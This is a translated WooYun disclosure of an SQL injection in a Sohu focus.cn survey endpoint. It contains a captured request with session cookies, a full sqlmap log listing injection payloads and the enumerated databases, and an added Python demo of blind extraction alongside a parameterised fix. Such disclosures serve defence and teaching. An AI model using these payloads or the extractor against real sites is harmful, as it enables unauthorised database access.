Vulnerability summary

Defect ID: wooyun-2015-0115917

Title: SQL injection on a Sohu site

Vendor: Sohu (搜狐)

Author: 路人甲

Submitted: 2015-05-24 21:04

Fixed: 2015-07-09 00:08

Published: 2015-07-09 00:08

Type: SQL injection

Severity: High

Self-assessed rank: 18

Status: confirmed by vendor

Source: http://www.wooyun.org. For questions or help contact [email protected]


Vulnerability details

Disclosure status:

2015-05-24: details sent to the vendor, awaiting vendor action
2015-05-25: vendor confirmed, details visible to the vendor only
2015-06-04: details opened to core white hats and domain experts
2015-06-14: details opened to regular white hats
2015-06-24: details opened to intern white hats
2015-07-09: details opened to the public

Brief description:

Round three!

Detailed description:

Round three (3) of my plush-toy hunt: SQL injection on a Sohu site.
On the sign-up form, fill in the fields and capture the request:

GET /Survey/submit?callback=jQuery203035808908636681736_1432457382472&sid=815&opts%5B2864%5D=asdasd&opts%5B2865%5D=asdasd&opts%5B2866%5D=asdasda&opts%5B2867%5D=13311111111&opts%5B2868%5D%5B%5D=8607&_=1432457382473 HTTP/1.1
Host: appsurvey.focus.cn
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Referer: http://chanye.focus.cn/news/2015-04-30/6221522.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: webimid2="Bih7ngb1O/Z2FBHSojt3FTJEK8Z4JtBLcJSvtBN5nK/N6Tl1Ctri69dXZyhIZ/62FXa+kHlRCCU="; bjforumsaw67851912=2707; IPLOC=CN5100; SUV=1504021051181769; esf_recommend_unit_search=d7fddb5a18f2caf2b7684f6ee7dcea37YToyOntzOjc6ImNpdHlfaWQiO2k6MTtzOjEwOiJzZWFyY2hfY29uIjthOjE6e2k6MjthOjE6e3M6OToiaG91c2VUeXBlIjthOjE6e3M6MjoiaW4iO2E6Mzp7aTowO2k6MjI7aToxO2k6MjA7aToyO2k6MjE7fX19fX0%3D; bjforumsaw=526%2C2707; lzstat_uv=10630109082488956093|3428069; PHPSESSID=v7vg9811gk5s1rt9g4ofequlq1; _ga=GA1.2.1530492624.1427944125; lastdomain=1432647781|ZGVhbGVyLWJhdDY5MjEwQHNvaHUuY29tfENDODdGMkM5NUEzQkM2M0Y5RkMzQUIwOUVDNUE5NjYyQHFxLnNvaHUuY29tfA|sohu.com; __utmt=1; sohutag=8HsmeSc5NCwmcyc5NCwmYjc5NCwmYSc5NCwmZjc5MiUsJ2cmOiAsJ24mOiAsJ2kmOiAsJ3cmOiAsJ2gmOiAsJ2NmOiAsJ2UmOiAsJ20mOiB9; __utma=1.1530492624.1427944125.1431101698.1432457112.6; __utmb=1.13.10.1432457112; __utmc=1; __utmz=1.1432457112.6.1.utmcsr=baidu|utmccn=(organic)|utmcmd=organic|utmctr=site%3Achanye.focus.cn%20inurl%3A%3D%3D


[Screenshot: QQ截图20150523235654.png]

[Screenshot: QQ截图20150524165759.png]


Proof of vulnerability:

[root@Hacker~]# Sqlmap Sqlmap -r E:\4.txt --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to o
[*] starting at 16:51:06
[16:51:06] [INFO] parsing HTTP request from 'E:\4.txt'
[16:51:07] [INFO] testing connection to the target URL
[16:51:07] [INFO] testing if the target URL is stable. This can take a couple of seconds
[16:51:08] [INFO] target URL is stable
[16:51:08] [INFO] testing if GET parameter 'callback' is dynamic
[16:51:08] [INFO] confirming that GET parameter 'callback' is dynamic
[16:51:08] [INFO] GET parameter 'callback' is dynamic
[16:51:08] [WARNING] heuristic (basic) test shows that GET parameter 'callback' might not be injectable
[16:51:08] [INFO] testing for SQL injection on GET parameter 'callback'
[16:51:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:51:08] [WARNING] reflective value(s) found and filtering out
[16:51:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[16:51:10] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[16:51:11] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[16:51:12] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[16:51:13] [INFO] testing 'MySQL inline queries'
[16:51:13] [INFO] testing 'PostgreSQL inline queries'
[16:51:13] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[16:51:13] [INFO] testing 'Oracle inline queries'
[16:51:13] [INFO] testing 'SQLite inline queries'
[16:51:13] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[16:51:14] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[16:51:15] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[16:51:15] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[16:51:16] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[16:51:17] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[16:51:18] [INFO] testing 'Oracle AND time-based blind'
[16:51:19] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[16:51:26] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[16:51:26] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it usi
[16:51:35] [WARNING] GET parameter 'callback' is not injectable
[16:51:35] [INFO] testing if GET parameter 'sid' is dynamic
[16:51:35] [INFO] confirming that GET parameter 'sid' is dynamic
[16:51:35] [INFO] GET parameter 'sid' is dynamic
[16:51:35] [INFO] heuristic (basic) test shows that GET parameter 'sid' might be injectable (possible DBMS: 'MySQL')
[16:51:35] [INFO] testing for SQL injection on GET parameter 'sid'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] y
[16:51:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:51:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[16:51:41] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[16:51:43] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)'
[16:51:44] [INFO] GET parameter 'sid' is 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)' injectable
[16:51:44] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[16:51:44] [INFO] GET parameter 'sid' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[16:51:44] [INFO] testing 'MySQL inline queries'
[16:51:45] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[16:51:55] [INFO] GET parameter 'sid' is 'MySQL > 5.0.11 stacked queries' injectable
[16:51:55] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[16:52:05] [INFO] GET parameter 'sid' is 'MySQL > 5.0.11 AND time-based blind' injectable
[16:52:05] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[16:52:05] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) techniq
[16:52:09] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[16:52:12] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns'
[16:52:15] [INFO] testing 'MySQL UNION query (random number) - 22 to 40 columns'
[16:52:17] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns'
[16:52:20] [INFO] testing 'MySQL UNION query (random number) - 42 to 60 columns'
[16:52:23] [INFO] testing 'MySQL UNION query (NULL) - 62 to 80 columns'
[16:52:26] [INFO] testing 'MySQL UNION query (random number) - 62 to 80 columns'
[16:52:28] [INFO] testing 'MySQL UNION query (NULL) - 82 to 100 columns'
[16:52:31] [INFO] testing 'MySQL UNION query (random number) - 82 to 100 columns'
[16:52:33] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
GET parameter 'sid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 446 HTTP(s) requests:
---
Place: GET
Parameter: sid
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: callback=jQuery203035808908636681736_1432457382472&sid=815 RLIKE IF(5132=5132,815,0x28)&opts[2864]=asdasd&opts[2865]=asdasd&opts
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: callback=jQuery203035808908636681736_1432457382472&sid=815 AND (SELECT 4934 FROM(SELECT COUNT(*),CONCAT(0x7165636671,(SELECT (CA
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: callback=jQuery203035808908636681736_1432457382472&sid=815; SELECT SLEEP(5)-- &opts[2864]=asdasd&opts[2865]=asdasd&opts[2866]=as
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: callback=jQuery203035808908636681736_1432457382472&sid=815 AND SLEEP(5)&opts[2864]=asdasd&opts[2865]=asdasd&opts[2866]=asdasda&o
---
[16:52:41] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[16:52:41] [INFO] fetching database names
[16:52:41] [INFO] the SQL query used returns 2 entries
[16:52:41] [INFO] retrieved: information_schema
[16:52:42] [INFO] retrieved: survey
available databases [2]:
[*] information_schema
[*] survey
[16:52:42] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 142 times
[16:52:42] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unha
[16:52:42] [INFO] fetched data logged to text files under 'F:\????\INJECT~1\SQLMAP~1.4\Bin\output\appsurvey.focus.cn'

Fix suggestion:

Sohu folks, could I get a plush toy? This is the third hole now, some encouragement would be nice; I really like your plushies, thx :)

Copyright notice: credit 路人甲@乌云 (WooYun) when reposting.
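The sqlmap log above shows that `sid` is spliced into the statement as text (a bare `815 AND SLEEP(5)` or `815 RLIKE IF(...)` would not reach MySQL otherwise) and that the boolean-based blind technique was enough to read the database names `information_schema` and `survey`. The following is an added example, not code from the report or from the focus.cn application: a vulnerable lookup with string concatenation, the same lookup hardened with type enforcement and a bound parameter, and a small boolean-blind extractor that recovers a value the endpoint never displays, the way sqlmap does. The schema, the `surveys` table and the function names are constructed for illustration; SQLite stands in for the real MySQL backend so the block runs offline, which is why the MySQL-only constructs in the recorded payloads (`RLIKE`, `SLEEP`, hex literals) are replaced by portable boolean conditions.

```python
import sqlite3
import string

# Constructed stand-in for the `survey` database that sqlmap enumerated.
# SQLite is used only so this runs offline; the real backend is MySQL.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE surveys (sid INTEGER PRIMARY KEY, title TEXT, open INTEGER);
        INSERT INTO surveys VALUES (815, 'registration', 1);
        INSERT INTO surveys VALUES (816, 'secret_draft', 0);
    """)
    return conn


def vulnerable_lookup(conn, sid):
    # The defect the report demonstrates: the request parameter becomes SQL
    # text, so "815 AND <condition>" is evaluated by the database.
    sql = "SELECT title FROM surveys WHERE sid = %s AND open = 1" % sid
    return [row[0] for row in conn.execute(sql)]


def hardened_lookup(conn, sid):
    # Fix: enforce the type the application expects, then bind the value.
    # int() raises ValueError on anything like "815 AND 1=1", and a bound
    # parameter is sent as data, never parsed as part of the statement.
    sid_int = int(sid)
    sql = "SELECT title FROM surveys WHERE sid = ? AND open = 1"
    return [row[0] for row in conn.execute(sql, (sid_int,))]


def oracle(conn, condition):
    # Boolean oracle: the injected condition is true exactly when the
    # survey 815 row still comes back (cf. sqlmap's "boolean-based blind").
    return bool(vulnerable_lookup(conn, "815 AND (%s)" % condition))


ALPHABET = string.ascii_lowercase + string.digits + "_"


def blind_extract(conn, inner_query, max_len=32):
    # Recover the single-value result of inner_query one character at a
    # time by asking yes/no questions through the oracle. Survey 816 is
    # closed (open = 0), so the endpoint itself never shows its title.
    result = ""
    for pos in range(1, max_len + 1):
        for ch in ALPHABET:
            cond = "(SELECT substr((%s), %d, 1)) = '%s'" % (inner_query, pos, ch)
            if oracle(conn, cond):
                result += ch
                break
        else:
            break  # no candidate matched: end of the string
    return result


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_lookup(db, "815 AND 1=1"))
    print(vulnerable_lookup(db, "815 AND 1=2"))
    print(blind_extract(db, "SELECT title FROM surveys WHERE sid = 816"))
    try:
        hardened_lookup(db, "815 AND 1=1")
    except ValueError as exc:
        print("rejected:", exc)
```

The two `vulnerable_lookup` calls reproduce the true/false pair sqlmap relies on; `blind_extract` turns that one bit per request into the full value of a row the form never renders, which is why the `survey` database names appear in the log even though the injection point is a plain survey submit. The `int()` check alone would stop this particular payload, but the bound parameter is the actual fix: it holds for string columns too, where a type check cannot help.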


Vendor response

Vendor reply:

Severity: Medium

Rank: 8

Confirmed at: 2015-05-25 00:07

Vendor comment:

Thanks for the support.
Please send us your address so we can mail you a fox.

Latest status:

None yet